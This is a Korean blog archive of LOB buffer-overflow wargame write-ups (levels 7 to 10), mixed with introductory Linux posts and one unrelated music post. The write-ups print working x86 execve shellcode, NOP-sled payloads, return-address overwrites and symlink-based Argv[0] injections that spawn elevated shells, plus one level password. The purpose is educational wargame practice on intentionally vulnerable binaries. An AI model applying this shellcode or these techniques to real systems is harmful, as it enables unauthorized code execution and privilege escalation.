0xbffffbf8: 0x40000000 0x00000008 0x00000000 0x00000009

0xbffffc08: 0x08048450 0x0000000b 0x000001fd 0x0000000c

0xbffffc18: 0x000001fd 0x0000000d 0x000001fd 0x0000000e

0xbffffc28: 0x000001fd 0x00000010 0x0fe9fbff 0x0000000f

0xbffffc38: 0xbffffc61 0x00000000 0x00000000 0x00000000

0xbffffc48: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc58: 0x00000000 0x00000000 0x38366900 0x00000036

0xbffffc68: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc78: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc88: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb8: 0x00000000 0x00000000

(gdb)

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd60: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd80: 0x00000000 0x00000000

(gdb)

0xbffffd88: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffda8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdb8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdc8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffde8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe18: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe48: 0x00000000 0x00000000

(gdb)

0xbffffe50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe60: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffea0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffec0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffed0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffee0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffef0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff10: 0x00000000 0x00000000

(gdb)

0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff48: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff58: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff68: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff78: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff88: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffa8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffb8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffc8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffd8: 0x00000000 0x00000000

(gdb)

0xbfffffe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffff0: 0x732f2e00 0x656c656b 0x006e6f74 0x00000000

0xc0000000: Cannot access memory at address 0xc0000000

끝 부분의 약간의 찌꺼기가 남아있는데 그 부분이 파일명, Argv[0] 부분이라고 하는데

정확히 왜 그런건지는 잘 모르겠습니다. 암튼 Argv[0] 을 이용해 공략하면 되는것이고 저번 페이로드처럼

공격하겠습니다.

[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[vampire@localhost xodnr]$ ll

total 84

-rw------- 1 vampire vampire 61440 Aug 27 21:13 core

-rwxrwxr-x 1 vampire vampire 12752 Aug 27 21:10 skeleton

-rw-r--r-- 1 vampire vampire 821 Aug 27 21:10 skeleton.c

lrwxrwxrwx 1 vampire vampire 8 Aug 27 21:21 ????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1É±2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î? -> skeleton

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xbf\xfa\xff\xbf"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿úÿ¿

Segmentation fault (core dumped)

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿þÿÿ¿

Segmentation fault (core dumped)

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ðÿÿ¿

Segmentation fault (core dumped)

[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'`

[vampire@localhost xodnr]$ ./`python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'` `python -c 'print "\x90"*44 + "\x26\xfc\xff\xbf"'`

&üÿ¿

Segmentation fault (core dumped)

그런데 계속해도 쉘이 뜨지를 않아서 코어를 확인해보았더니 정상적으로 들어가있습니다.

(gdb)

0xbfffff68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffffa8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffffb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffffc8: 0xeb909090 0xc9315e11 0x6c8032b1 0x8001ff0e

0xbfffffd8: 0xf67501e9 0xeae805eb 0x32ffffff 0x306951c1

0xbfffffe8: 0x69697430 0x6f6a6330 0x5451e48a 0xb19ae28a

0xbffffff8: 0x0081ce0c 0x00000000 Cannot access memory at address 0xc0000000

그래서 위의 주소로 이동시켜줘도 쉘이 뜨지를 않길래 한번 짧은 쉘코드를 써보았는데 그래도 쉘이 뜨지를 않았습니다. ㅠ;

이상하게 쉘이 뜨지를 않습니다. 나중에 꼭 다시 풀어보도록 하겠습니다.

Stack Frame Pointer Overflow - 프레임 포인터 오버플로우

XoDNr_ 깝태 — Sun, 04 Sep 2011 03:02:43 +0900

프레임 포인터 오버플로우.txt

LOB 다크나이트 문제에서 사용되는 기술인 프레임 포인터 오버플로우 입니다.
SFP의 1바이트를 조작해 공격한다는데서 1바이트 오버플로우라는 별명도 있습니다.
설명이 매우 잘 되어있으므로 보면서 공부하시면 됩니다.

[Chapter 1] 리눅스 시스템 프로그래밍 시작

XoDNr_ 깝태 — Sun, 21 Aug 2011 14:20:50 +0900

(1) 유닉스(UNIX) 운영체제는 벨 연구소에서 제작되었으며 그 중 1970년대 PDF 컴퓨터들을 위해 설계된 유닉스는
다중 프로세서 서버들과 슈퍼컴퓨터들에 이르기까지 다양한 하드웨어 플랫폼을 위한 다중 사용자, 다중 태스킹 운영체제로 유명했다.

(2) 리눅스(LINUX) 운영체제는 리누스 토발즈가 유닉스 프로그래머들의 도움을 받아 제작했으며 유닉스류 커널의 한 부분이다.
유닉스에서 실행되는것은 실제로 리눅스에서도 거의 실행된다.

(3) 리눅스 프로그램
워게임에서 설명한적이 있지만, 리눅스 시스템에 로그인하고 쉘이 실행되고 우리는 쉘과 상호작용하면서 프로그램을 실행한다.

우리가 입력한(요청한) 명령어를 먼저 쉘(보통 bash)의 명령어인지 확인하고 그렇지 않을경우
특정 폴더안에 (명시되어있는)선언되어있는 폴더안에서 동일한 이름을 가진 파일을 명령어(or 프로그램) 인지 확인한다.
그 특정폴더를 우리는 PATH 환경변수라고 부른다. PATH 환경변수는 보통 시스템 관리자가 설정해두지만 일반 사용자가
직접 추가하거나 수정할 수 있다.

env 로 사용자 환경을 먼저 확인할 수 있고 echo $PATH 로 PATH 환경변수를 확인할 수 있다.
환경변수를 선언할때는 export PATH="경로" or '명령어' 위 세가지 명령어를 이용해 관리할 수 있다.

[gate@localhost iyounges.org]$ env

LESSOPEN=|/usr/bin/lesspipe.sh %s

USERNAME=

HISTSIZE=1000

HOSTNAME=localhost.localdomain

LOGNAME=gate

REMOTEHOST=192.168.246.1

MAIL=/var/spool/mail/gate

TERM=xterm

HOSTTYPE=i386

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin

HOME=/home/gate

INPUTRC=/etc/inputrc

SHELL=/bin/bash

USER=gate

BASH_ENV=/home/gate/.bashrc

LANG=en_US

OSTYPE=Linux

SHLVL=1

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

_=/usr/bin/env

[gate@localhost iyounges.org]$ echo $PATH

/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin

위 PATH 변수의 항목들을 구분할때는 : 를 기준으로 구별하며 왼쪽에서 오른쪽으로 읽어간다.
고로 A, B 폴더안에 똑같은 파일이 들어있는데 선언될때 B : A 로 선언이되면 B 에 있는 프로그램을 먼저 보고 실행한다는것이다.
그러면 환경변수를 직접 추가해보겠습니다.

[gate@localhost iyounges.org]$ export PATH="/tmp/iyounges.org:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin"

[gate@localhost iyounges.org]$ env

LESSOPEN=|/usr/bin/lesspipe.sh %s

USERNAME=

HISTSIZE=1000

HOSTNAME=localhost.localdomain

LOGNAME=gate

REMOTEHOST=192.168.246.1

MAIL=/var/spool/mail/gate

TERM=xterm

HOSTTYPE=i386

PATH=/tmp/iyounges.org:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin

HOME=/home/gate

INPUTRC=/etc/inputrc

SHELL=/bin/bash

USER=gate

BASH_ENV=/home/gate/.bashrc

LANG=en_US

OSTYPE=Linux

SHLVL=1

_=/usr/bin/env

/tmp/iyounges.org 가 추가된것을 확인할 수 있다.

(4) 추가! - 리눅스 시스템 디렉터리 구조
리눅스는 디렉터리를 하나의 파일로 인식한다.

[ / ] : 최상위 디렉터리 (루트 디렉터리)
┣ [ /bin ] : 기본 사용자 명령어
┣ [ /boot ] : 부팅 파일
┣ [ /dev ] : 각종 장치 파일(하드디스크, CD-ROM 드라이브)

┣ [ /etc ] : 시스템 관리에 필요한 스크립트와 설정파일

┣ [ /home ] : 사용자 홈 디렉터리

   ┣ [       /lib      ] : 각종 라이브러리, 커널 모듈
┣ [ /lost+found ] : 파일 시스템 복구를 위한 디렉터리
┣ [    /mnt      ] : 마운트될 파일시스템의 마운트 포인터
┣ [      /opt      ] : 부가 응용 프로그램 패키지 설치파일
┣ [     /proc     ] : 시스템의 효율적 관리를 위한 메모리상에 만들어 놓은 가상 디렉터리
┣ [      /root    ] : 루트 사용자만 접속이 가능한 루트 디렉터리
┣ [     /sbin     ] : 시스템 관리에 관려된 실행파일 포함
┣ [    /tmp      ] : 각 장치에 필요한 소켓, 임시파일 보관
┣ [     /usr      ] : 시스템에 필요한 모든 명렁어, 라이브러리, 메뉴얼 페이지
　　　 ┣ [　/usr/bin     ] : /bin 에 없는 명령어
　　　　 ┣ [ /usr/include ] C 언어 헤더 파일들
　　　　 ┗ [　 /usr/src 　] : 컴파일 되지 않은 소스코드, 커널 소스코드 포함
┗ [ /var ] : 가변저장 공간 - 메일서버일경우 메일저장, 시스템 로그, 네트워크 로그 저장

(5) 정적 라이브러리와 공유 라이브러리
[추가예정]

리눅스 심볼릭링크와 하드링크

XoDNr_ 깝태 — Sun, 21 Aug 2011 13:26:49 +0900

리눅스에 링크는 심볼릭링크와 하드링크 두 가지가 있다.
먼저 심볼릭 링크는 간단하게 윈도우즈에서의 바로가기라고 생각하면 된다.

ln -s 원본파일이름 링크파일이름

[gate@localhost iyounges.org]$ ls

iyounges

[gate@localhost iyounges.org]$ ln -s iyounges iyounges_

[gate@localhost iyounges.org]$ ls -l

total 0

-rw-rw-r-- 1 gate gate 0 Aug 20 02:55 iyounges

lrwxrwxrwx 1 gate gate 8 Aug 20 03:06 iyounges_ -> iyounges

이처럼 사용해주면 된다. 그런데 심볼릭 링크는 단지 바로가기 일뿐, 파일 안은 텅텅 비어있으며
심볼릭 링크가 걸어진 파일을 수정한다해도 원본파일은 수정되지 않는다.
그 이유는 inode 라는 고유번호를 서로 공유하지 않기 때문이다. inode 는 운영체제가 파일을 구별하기 위해 부여한것인데
예를 들면 고정 아이피라고 생각하면 쉽게 이해될듯 하다.

두번째, 하드링크는 심볼릭 링크와 똑같은 의미인데 단 inode 를 공유하기 때문에
하드링크에서 파일을 수정하면 원본 파일 또한 수정된다.

ln 원본파일이름 링크파일이름

[gate@localhost iyounges.org]$ ln iyounges iyounges__

[gate@localhost iyounges.org]$ ls

iyounges iyounges__

[gate@localhost iyounges.org]$ ls -l

total 0

-rw-rw-r-- 2 gate gate 0 Aug 20 02:55 iyounges

-rw-rw-r-- 2 gate gate 0 Aug 20 02:55 iyounges__

단, 주의해야할것은 원본파일이 삭제된다면 링크가 걸어진 파일은 아무 쓸모가 없으니 주의해야한다.
마치 윈도우즈에서 바로가기를 실행했을때 원본파일을 찾을수 없다면서 뜨는 메세지처럼 된다고 생각하면 된다.

리눅스 GDB 어셈블리어 AT&T 문법을 intel 문법으로 바꾸는 방법 //AT&T -> INTEL

XoDNr_ 깝태 — Sat, 20 Aug 2011 23:40:01 +0900

먼저 AT&T 와 INTEL 둘의 문법 차이를 설명해보자면

mov $esp, $edx // EDX 에 ESP 를 복사한다. (A<-B)
mov edx, esp // EDX 를 ESP 에 복사한다. (A->B)

이 둘이 서로 같은 뜻을 의미한다. 대체적으로 intel 문법이 특수문자를 사용하지 않고 해석방법도 매우 간단하다.
그래서 올리디버거를 사용하는 초보자들은 GDB 로 넘어오면 어려움을 호소하는데 이를 해결하는 방법이 있다.

GDB 를 실행하고 다음과 같은 명령어를 입력한다.

(gdb) set disassembly-flavor intel

종료하고 다시 실행하면 원래 AT&T 문법으로 돌아오는데
다음 명령어를 실행하면 intel 문법으로 고정된다.

(gdb) set disassembly-flavor intel
(gdb) q

$echo "set disassembly-flavor intel" > ~./gdbinit
$cat ~/.gdbinit

위 처럼 입력해주면 계속 intel 문법으로 확인할 수 있다.

슈퍼스타K3 소름돋는 신지수 Rolling in the Deep 영상 /심사위원 극찬 신지수 동영상

XoDNr_ 깝태 — Sat, 20 Aug 2011 11:37:05 +0900

신지수 동영상, 슈퍼스타K 신지수 동영상, 신지수 Rolling in the Deep 동영상, 신지수 영상
팝송 : http://www.youtube.com/watch?v=rYEDA3JcQqw&ob=av3e

제가 이런 풍의 노래를 좋아해서 매우 즐겨듣는 노래인데 슈퍼스타K3 를 보는데 허각 교회동생이라는 신지수라는
여자애가 이 노래를 부르길래 얼마나 부를까 기대되서 들어봤더니 완전 듣는데 소름이 다 돋았습니다. ;
윤종신은 희소가치 목소리라고 하며, 서인영, 인순이 모두 극찬을 했습니다.

저는 1, 2화 모두 끝까지 시청하였는데 개인적으로 1화에선 손예림, 2화에서는 신지수 인것 같네요
진짜 다시들어봐도 소름끼치는것 같습니다.

팝송도 자기 목소리에 맞는 노래를 선정한것같고 19살인데 이렇게 잘 부른다는건.......
진짜 왠만한 가수들이랑 비교해도 손색이 없을거라고 생각됩니다.

[BOF-Wargames] LOB Load of BOF LEVEL9 (troll -> vampire) 문제풀이

XoDNr_ 깝태 — Fri, 19 Aug 2011 21:54:26 +0900

-------------------------------------------------------------------------------------------------------------------------
LOB Level9 [ Troll -> Vampire ]

-------------------------------------------------------------------------------------------------------------------------

[troll@localhost troll]$ ./vampire

argv error

[troll@localhost troll]$ ./vampire aa

stack is still your friend.

[troll@localhost troll]$ cat vampire.c

The Lord of the BOF : The Fellowship of the BOF

- vampire

- check 0xbfff

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char buffer[40];

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// here is changed!

if(argv[1][46] == '\xff')

{

printf("but it's not forever\n"); // 이번에는 마지막 문자 전이 \xff 인지 검사합니다. 맞으면 종료된다.

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

고로 이번에는 RET 의 마지막을 \xbf 라고 하고, 그 다음은 \xff 가 아닌 다른 문자열을 집어넣어야된다는 말입니다.

과연 어떤 방법을 써야할까요...? 일단 메모리 구조를 다시 한번 보겠습니다.

Buffer (40Byte) | SFP (4Byte) | RET (4Byte) | Argc Argv[0] Argv[1] Argv[2] |

이렇게 되어있는데 저는 여태까지 Argv[2] 에 NOP 와 쉘코드를 넣어주었습니다.

그리고 Argv[1] 에서 RET 를 조작할때 Argv[2] 의 주소를 조작하였습니다. 그런데 보통 소스에서 수정해서

주소를 출력하게 해주었는데, 그게 시작주소건 어떤 주소건 만약 앞에 있는 값이 많으면 많을수록 주소는 더욱

뒤로 밀려나게될것이고 \xbf ff ** ** 뒤로도 밀려나게될것입니다.

그러니깐 한 마디로 NOP 를 더 무진장 많이 넣어보자는 말입니다.

그러면 일단 사본파일에 Argv[2] 를 넣어보고 과연 얼만큼 넣어야지 주소 값이 더 크게 나올지 테스트해보겠습니다.

printf("0x%x\n", argv[2]); <-- 구문을 넣어 테스트해보았더니 아래와 같은 결과가 나왔습니다.

[troll@localhost xodnr]$ ./vampire `python -c 'print "\xbf"*48'` `python -c 'print "\x90"*30000'`

0xbfff877f

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

평소에 NOP 를 30000개 씩이나 넣어줘보았습니다. 어디 한번 더 넣어볼까요?

[troll@localhost xodnr]$ ./vampire `python -c 'print "\xbf"*48'` `python -c 'print "\x90"*50000'`

0xbfff395f

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[troll@localhost xodnr]$ ./vampire `python -c 'print "\xbf"*48'` `python -c 'print "\x90"*80000'`

0xbffec42f

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[troll@localhost xodnr]$ ./vampire `python -c 'print "\xbf"*48'` `python -c 'print "\x90"*100000'`

0xbffe760f

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

보시다시피 80000개를, NOP 값을 8만개 넣어줬을때부터 bf fe 76 0f 이렇게 값이 달라지게되고

추가된 if 문인 \xff 를 검사하는 조건또한 뛰어넘을 수 있습니다.

그러면 어디 한번 공략해보겠습니다.

[troll@localhost xodnr]$ ./vampire `python -c 'print "\xbf"*48'` `python -c 'print "\x90"*80000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

0xbffec416

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

주소가 나왔습니다. 위 주소로 Argv[1] 에서 RET 의 값을 조작하고 넘겨줘보겠습니다.

[troll@localhost xodnr]$ ./vampire `python -c 'print "\xbf"*44 + "\x16\xc4\xfe\xbf"'` `python -c 'print "\x90"*80000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

0xbffec416

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Äþ¿

bash$ exit

성공적으로 쉘이 떴으니 원본파일에서 실행해봅시다.

[troll@localhost xodnr]$ cd ..

[troll@localhost troll]$ ./vampire `python -c 'print "\xbf"*44 + "\x16\xc4\xfe\xbf"'` `python -c 'print "\x90"*80000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Äþ¿

bash$ id

uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)

bash$ my-pass

euid = 509

[ 패스워드 ]

성공적으로 문제가 풀어졌습니다! ^^

[BOF-Wargames] LOB Load of BOF LEVEL8 (orge -> troll) 문제풀이

XoDNr_ 깝태 — Fri, 19 Aug 2011 21:52:28 +0900

------------------------------------------------------------------------------------------------------------------------
LOB Level8 [ Orge -> Troll ]

-------------------------------------------------------------------------------------------------------------------------

[orge@localhost orge]$ ls

troll troll.c

[orge@localhost orge]$ ./troll

argc must be two!

무조건 인자가 두개 있어야지만 됩니다. 여기서 인자 두개는

Argv[0] 과 Argv[1] 을 의미합니다.

[orge@localhost orge]$ ./troll aa

stack is still your friend.

[orge@localhost orge]$ cat troll.c

The Lord of the BOF : The Fellowship of the BOF

- troll

- check argc + argv hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

// here is changed

if(argc != 2){

printf("argc must be two!\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// one more!

memset(argv[1], 0, strlen(argv[1])); // Argv[1] 을 Argv[1] 의 길이만큼 초기화 합니다. 고로 Argv[1] 에 어떤값을 넣어줘도 0 으로 초기화 됩니다.

}

일단 이 문제는 Argv[0] 과 Argv[1] 로만 공략을 해야되는데 Argv[1] 은 자동으로 초기화가 되지만 RET 는 덮을 수 있습니다.

어떻게 공격을 해야될까요? Argv[0] 을 이용해 공략하시면 됩니다.

심볼릭 링크를 이용해 Argv[0] 에 쉘코드를 올려놓고 Argv[1] 에는 "\xbf" 와 RET 만 해주면 되는데

[orge@localhost xodnr]$ ln -s troll `python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

ln: cannot create symbolic link `1ÀPh//shh/bin‰ãPS‰á1Ò°

Í€' to `troll': No such file or directory

그런데 여기서 문제가 쉘코드에 \x2f 가 있을경우 쉘코드가 정상적으로 돌아가지 않는다는 것입니다.

그래서 \x2f 가 없는 쉘코드를 사용해야하는데 다음의 쉘코드를 사용하면 됩니다.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

먼저 Argv[0] 의 주소를 알아내기 위해 전과 똑같이 수정하고 컴파일한다음

printf("0x%x\n", argv[0]);

심볼릭 링크를 이용해 Argv[0], 프로그램 이름을 NOP 와 쉘코드로 덮어보겠습니다.

주소가 나왔습니다. bffffabf 로 공격을 하면 됩니다.

원본파일로 나와 스크립트를 구성하고 공격해보겠습니다.

bash2-2.03$ ls

troll troll.c xodnr

bash2-2.03$ ln -s troll `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

bash2-2.03$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xbf\xfa\xff\xbf"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿úÿ¿

bash$ id

uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)

bash$ my-pass

euid = 508

aspirin

성공적으로 정답이 출력되었습니다.

[BOF-Wargames] LOB Load of BOF LEVEL7 (darkelf -> orge) 문제풀이

XoDNr_ 깝태 — Fri, 19 Aug 2011 21:40:19 +0900

-------------------------------------------------------------------------------------------------------------------------
LOB Level7 [ Darkelf-> Orge ]

-------------------------------------------------------------------------------------------------------------------------

[darkelf@localhost darkelf]$ ls

orge orge.c xodnr

[darkelf@localhost darkelf]$ ./orge

argv error

[darkelf@localhost darkelf]$ cat orge.c

The Lord of the BOF : The Fellowship of the BOF

- orge

- check argv[0]

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// here is changed!

if(strlen(argv[0]) != 77){

printf("argv[0] error\n");

// argv[0] == Program Name, 파일이름의 길이가 77 이 아닐경우 에러가 출력되면서 프로그램이 종료됩니다.

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

}

# 인자헌터 + 에그헌터 + 버퍼헌터

# 새로운 헌터가 추가되었습니다. 네임헌터?!

# 이 헌터는 Argv[0] 까지 접근을 합니다. Argv[0] != 77,

# 즉 프로그램 이름의 길이가 77자가 아니라면 프로그램은 종료됩니다.

아까 바이너리 파일 디버깅 한게 도움이 많이 되겠군요,

Argv[0] 은 프로그램의 네임을 뜻합니다.

그러면 어떻게 해야 할까요? 프로그램의 이름을 수정할까요?

바로가기아시죠?

